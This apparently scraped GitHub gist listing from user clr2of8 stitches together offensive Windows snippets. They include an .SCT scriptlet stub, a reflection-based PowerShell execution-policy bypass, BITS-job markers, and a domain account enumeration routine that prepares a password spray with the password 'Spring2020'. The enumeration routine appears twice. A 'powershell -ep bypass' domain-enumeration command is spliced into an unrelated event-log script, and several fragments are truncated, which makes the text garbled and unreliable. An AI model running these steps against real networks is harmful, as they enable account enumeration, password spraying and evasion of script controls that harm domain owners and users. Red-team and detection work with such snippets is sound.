clr2of8 / test.sct
Created September 15, 2022 21:18 — forked from bohops/test.sct
.SCT for testing (++++ @subTee)
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
clr2of8 / Watch-EventLogTail.ps1
Created September 11, 2022 01:45 — forked from LeeHolmes/Watch-EventLogTail.ps1
Tail an event log through PowerShell
## PowerShell Eventing lets you tail an event log:
## http://powershellcookbook.com/recipe/IMyz/respond-to-automatically-generated-events
$watcher = New-Object System.Diagnostics.Eventing.Reader.EventLogWatcher "Microsoft-Windows-PowerShell/Operational"
Register-ObjectEvent $watcher EventRecordWritten -Action {
$event = $eventArgs.EventRecord
if($event.ProcessId -ne $pid)
{
## Save the last event into a variable in the PowerShell sesssion if you want to explore its properties,
## as the eventing actions run in their own runspace
# $GLOBAL:lastEvent = $event
powershell -ep bypass -command "$s=gwmi Win32_ComputerSystem; if (-not $s.PartOfDomain) { $n=-1 } else { $dr='LDAP://';$s.Domain.Split('.') | % { $dr+='DC='+$_+',' }; $dr=$dr.TrimEnd(','); try { $ad=New-Object DirectoryServices.DirectorySearcher(([adsi]$dr),'(objectCategory=computer)',('name')); $n=($ad.FindAll()).Count } catch { $n=-2} };write-host " Hosts count: " $n; "
clr2of8 / bypassPowershellExecutionPolicy.ps1
Created October 24, 2020 22:03
bypass powershell execution policy
# from https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
# Replaces the running session's AuthorizationManager with a freshly constructed base
# AuthorizationManager, so the execution-policy check is no longer consulted for scripts
# started in this process. The private ExecutionContext fields "_context" and
# "_authorizationManager" are reached through reflection (GetField with
# NonPublic,Instance), so this depends on undocumented PowerShell internals and may
# break between versions.
# Only the in-memory session is touched; nothing here calls Set-ExecutionPolicy or
# writes the registry, so other sessions and the configured policy are unchanged.
# NOTE(review): execution policy is a guard against accidental execution, not a
# security boundary; where script block logging is enabled the reflective
# GetField("_authorizationManager") call is the observable to look for.
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}
# Apply the swap to the current session as soon as the file is loaded.
Disable-ExecutionPolicy
rem Writes a one-line marker to the user's desktop; presumably run as a BITS job's command
rem line to prove the job executed (the file name suggests so -- confirm against the job setup).
rem cmd.exe's echo writes the double quotes literally, and %HOMEPATH% carries no drive letter,
rem so the path resolves against the current drive (pair with %HOMEDRIVE% if that matters).
echo "Bits Job Executed" > %HOMEPATH%\Desktop\bitsjob.txt
# Appends a one-line marker to bitsjob.txt on the user's desktop (Add-Content appends,
# so repeated runs accumulate lines rather than overwrite).
Add-Content -Path "$env:USERPROFILE\desktop\bitsjob.txt" -Value 'Bits job executed'
{
"name": "AzureCloudBrainStorming",
"version": "3.0",
"domain": "mitre-enterprise",
"description": "",
"filters": {
"stages": [
"act"
],
"platforms": [
function setKey($registryPath, $Name, $Value, $Type="DWORD") {
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force | Out-Null
New-ItemProperty -Path $registryPath -Name $Name -Value $value -PropertyType $Type -Force | Out-Null
}
rem Create the users.txt by parsing the "net users /domain" output
rem Written for pasting at an interactive cmd prompt (single-% FOR variables), not for a .bat file.
rem Scratch files 1.txt/2.txt/3.txt live in %temp%; the line below clears leftovers from an earlier run.
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
rem 1.txt: every account row after the 6 header lines, with the "The command completed ..." trailer
rem removed and each space replaced by a comma. The caret stops %line:...% from being expanded before
rem the loop starts; CALL re-expands it once per row.
rem NOTE(review): "net users /domain" pulls the full account list from a domain controller; a
rem workstation enumerating the whole directory this way is a typical detection signal.
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt
rem 2.txt: ", " collapsed to ","
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt
rem 3.txt: the first three comma-separated fields of each row, one per line
rem (consecutive commas count as a single delimiter, so the runs of commas from step 1 are fine)
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt
rem users.txt: drop the "ECHO is on." lines that rows with fewer than three fields produce
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt
rem Reset the command window title so you can see the progress of the password spray in the title
title Command Prompt
rem Set your password for the spray here
rem (a plain cmd environment variable, so it is inherited by every child process started from this window)
set password=Spring2020
rem Rebuild %temp%\users.txt from "net users /domain"; first clear scratch files from an earlier run.
rem Single-% FOR variables: this is meant to be pasted at an interactive prompt, not saved as a .bat file.
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
rem 1.txt: account rows after the 6 header lines, trailer removed, each space replaced by a comma
rem (the caret keeps %line:...% from expanding before the loop runs; CALL re-expands it per row).
rem NOTE(review): the full account listing comes from a domain controller; bulk enumeration from a
rem workstation is the observable a defender would alert on here.
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt
rem 2.txt: ", " collapsed to ","
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt
rem 3.txt: first three comma-separated fields of each row, one per line (consecutive commas count as one delimiter)
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt
rem users.txt: drop the "ECHO is on." lines produced by rows with fewer than three fields
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt